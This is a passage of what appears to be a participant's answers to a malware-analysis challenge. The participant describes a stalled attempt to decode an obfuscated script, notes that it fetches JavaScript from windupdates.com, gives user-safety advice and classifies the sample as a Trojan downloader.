From the size of it, we can see that this is most likely what's about to do the majority of the work. I put it through my decryptor and … well what do you know, it stalls out when trying to grab the user agent. Because the script never finishes I wasn't able to make it decode itself. Could it be because the box is fully patched up through October? Guess I'll find out when other people post their answers.

9. If you could give only one piece of advice to your users, based on what you observed on this malware, what would you say?

Always be careful when going to websites. The javascripts are downloaded from windupdates.com, and the malware tries to pretend to be Yahoo! and MSN even though it doesn't do a good job of it. Modern phishing emails are more convincing.

10. Do you think that our affected user was lying to the IR Team?

I do not think the user was lying. One of the main websites that feeds this malware is windupdates.com. An uninformed or simple user might think that it's just short for Windows Updates and not know that they should only update their computer by clicking Start->Programs->Windows Update, which should take them to http://windowsupdate.microsoft.com

11. Finally(!!), how would you classify this malware?

I'm not familiar with the various categories the malware could be categorized in. But I might consider it a Trojan since it claims to do one thing but does another, and maybe as a downloader since it goes out to the windupdates.com website to grab its JavaScript files. The remote files can be updated to provide new improved functionality while the only infecting executable won't need to be updated.
